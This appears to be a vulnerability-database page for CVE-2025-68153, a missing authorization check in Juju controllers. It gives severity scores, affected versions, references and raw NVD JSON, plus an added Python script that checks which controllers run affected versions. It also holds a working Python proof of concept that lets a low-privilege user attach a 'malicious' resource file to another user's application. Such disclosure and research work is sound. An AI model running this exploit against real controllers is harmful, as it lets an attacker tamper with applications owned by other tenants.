Security Vulnerability Report
CVE-2025-68153 CVSS 6.5 MEDIUM

Published: 2026-04-03 16:16:23
Last Modified: 2026-04-21 01:24:02

Description

Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, any authenticated user, machine or controller under a Juju controller can modify the resources of an application within the entire controller. This issue has been patched in versions 2.9.56 and 3.6.19.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CVSS 4.0 (secondary score supplied by the CNA)
7.1 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE (Juju >= 2.9.0, < 2.9.56)
cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE (Juju >= 3.6.0, < 3.6.19)
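The affected ranges above are the operational question for most readers: is a given controller inside them? The following checker is an added example, not code from the report or from the Juju project. It reads the vulnerable version bounds from a trimmed copy of the NVD configuration block shown on this page (constructed inline), parses Juju version strings including the binary-style `3.6.18-genericlinux-amd64` form, and flags controllers by their agent version. The shape of the `juju controllers --format=json` document it consumes is an assumption; only the per-controller `agent-version` field is read.

```python
"""Check Juju versions against the affected ranges published for CVE-2025-68153.

Added example; not part of the original report or of the Juju project.
The ranges come from the NVD configuration block on this page:
    >= 2.9, <= 2.9.55   (fixed in 2.9.56)
    >= 3.6, <= 3.6.18   (fixed in 3.6.19)
"""
import json
import re

# Constructed sample: the report's "configurations" array, trimmed to the keys used here.
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
   "versionStartIncluding": "2.9", "versionEndIncluding": "2.9.55"},
  {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
   "versionStartIncluding": "3.6", "versionEndIncluding": "3.6.18"}]}]}]
""")

# Constructed sample in the shape of `juju controllers --format=json` (assumed shape;
# only each controller's "agent-version" is read). The flaw is in the controller,
# so the controller agent version is what matters, not the client's `juju version`.
SAMPLE_CONTROLLERS = json.loads("""
{"controllers": {
   "prod":    {"agent-version": "3.6.18", "cloud": "openstack", "region": "eu1"},
   "staging": {"agent-version": "3.6.19", "cloud": "lxd"},
   "legacy":  {"agent-version": "2.9.55", "cloud": "maas"}},
 "current-controller": "prod"}
""")

_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)(?:\.(?P<patch>\d+))?"
    r"(?:-(?P<pre>alpha|beta|rc)(?P<pre_num>\d*))?"
)


def parse_version(text):
    """Parse '3.6.18', '2.9' (an NVD bound) or a binary-style '3.6.18-genericlinux-amd64'
    into a comparable tuple. A missing patch level reads as 0, and a pre-release
    tag (alpha/beta/rc) sorts below the final release with the same number."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Juju version: {text!r}")
    major, minor = int(m["major"]), int(m["minor"])
    patch = int(m["patch"] or 0)
    if m["pre"]:
        return (major, minor, patch, 0, _PRE_RANK[m["pre"]], int(m["pre_num"] or 0))
    return (major, minor, patch, 1, 0, 0)


def affected_ranges(configurations):
    """Collect the bounds of every cpeMatch entry marked vulnerable. NVD uses four
    optional keys; an absent key means that side of the range is unbounded."""
    ranges = []
    for config in configurations:
        for node in config["nodes"]:
            for match in node["cpeMatch"]:
                if match.get("vulnerable"):
                    ranges.append({key: match.get(key) for key in (
                        "versionStartIncluding", "versionStartExcluding",
                        "versionEndIncluding", "versionEndExcluding")})
    return ranges


def _in_range(version, bounds):
    b = {k: parse_version(v) for k, v in bounds.items() if v}
    if "versionStartIncluding" in b and version < b["versionStartIncluding"]:
        return False
    if "versionStartExcluding" in b and version <= b["versionStartExcluding"]:
        return False
    if "versionEndIncluding" in b and version > b["versionEndIncluding"]:
        return False
    if "versionEndExcluding" in b and version >= b["versionEndExcluding"]:
        return False
    return True


def is_affected(version_text, configurations=NVD_CONFIGURATIONS):
    """True if the version falls inside any listed vulnerable range. False means
    'not in a listed range', which is not a statement of safety: the advisory
    lists only the 2.9 and 3.6 series."""
    version = parse_version(version_text)
    return any(_in_range(version, bounds) for bounds in affected_ranges(configurations))


def flag_controllers(controllers_doc, configurations=NVD_CONFIGURATIONS):
    """Map controller name -> affected, judged by each controller's agent version."""
    return {name: is_affected(info["agent-version"], configurations)
            for name, info in controllers_doc["controllers"].items()}


if __name__ == "__main__":
    for name, hit in flag_controllers(SAMPLE_CONTROLLERS).items():
        print(f"{name}: {'AFFECTED' if hit else 'not in a listed range'}")
```

Two caveats the checker encodes: a controller is judged by its own agent version, because the missing authorization check lives in the controller and a patched client changes nothing; and a result of "not in a listed range" for a series the advisory does not mention (for example 3.5) is not a statement that the series is safe, only that NVD publishes no range for it.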

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
from juju import jasyncio
from juju.model import Model

# PoC for CVE-2025-68153: Juju resource modification without an ownership check.
# Connects as an ordinary authenticated user and attaches a resource to an
# application that user does not own. On a patched controller (2.9.56 / 3.6.19)
# the call is rejected with a permission error.

CONTROLLER_MODEL = "admin/controller.local"  # placeholder: <controller>:<owner>/<model>
TARGET_APP = "target-application-name"        # application owned by another user
RESOURCE_NAME = "resource-name"               # resource declared by the target charm
MALICIOUS_FILE = "bad-resource.zip"           # attacker-supplied resource payload (local file)


async def exploit():
    model = Model()
    # Connect to the vulnerable controller with the low-privilege credentials
    # already configured for the local juju client.
    await model.connect(CONTROLLER_MODEL)

    print(f"[*] Attempting to modify resources for application: {TARGET_APP}")
    try:
        app = model.applications.get(TARGET_APP)
        if app is None:
            print(f"[-] Application {TARGET_APP!r} not found in this model")
            return
        # In vulnerable versions the controller does not check that the caller
        # may write to the application, so the upload is accepted.
        # libjuju's attach_resource takes (resource_name, file_name, file_obj).
        with open(MALICIOUS_FILE, "rb") as payload:
            await app.attach_resource(RESOURCE_NAME, MALICIOUS_FILE, payload)
        print("[+] Exploit successful! Application resource has been modified.")
    except Exception as e:
        print(f"[-] Exploit failed or patch applied: {e}")
    finally:
        await model.disconnect()


if __name__ == "__main__":
    jasyncio.run(exploit())

References

https://github.com/juju/juju/security/advisories/GHSA-245v-p8fj-vwm2 - Vendor Advisory
https://github.com/juju/juju/commit/26ff93c903d55b0712c6fb3f6b254710edb971d4 - Patch

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68153", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:23.357", "lastModified": "2026-04-21T01:24:01.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, any authenticated user, machine or controller under a Juju controller can modify the resources of an application within the entire controller. This issue has been patched in versions 2.9.56 and 3.6.19."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.9", "versionEndIncluding": "2.9.55", "matchCriteriaId": "E0EAA4DD-F373-4A67-B571-D3899E1E13CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndIncluding": "3.6.18", "matchCriteriaId": "6EDFE9C5-AB90-4FA2-84FF-C005BE2B6D6F"}]}]}], "references": [{"url": "https://github.com/juju/juju/commit/26ff93c903d55b0712c6fb3f6b254710edb971d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/security/advisories/GHSA-245v-p8fj-vwm2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}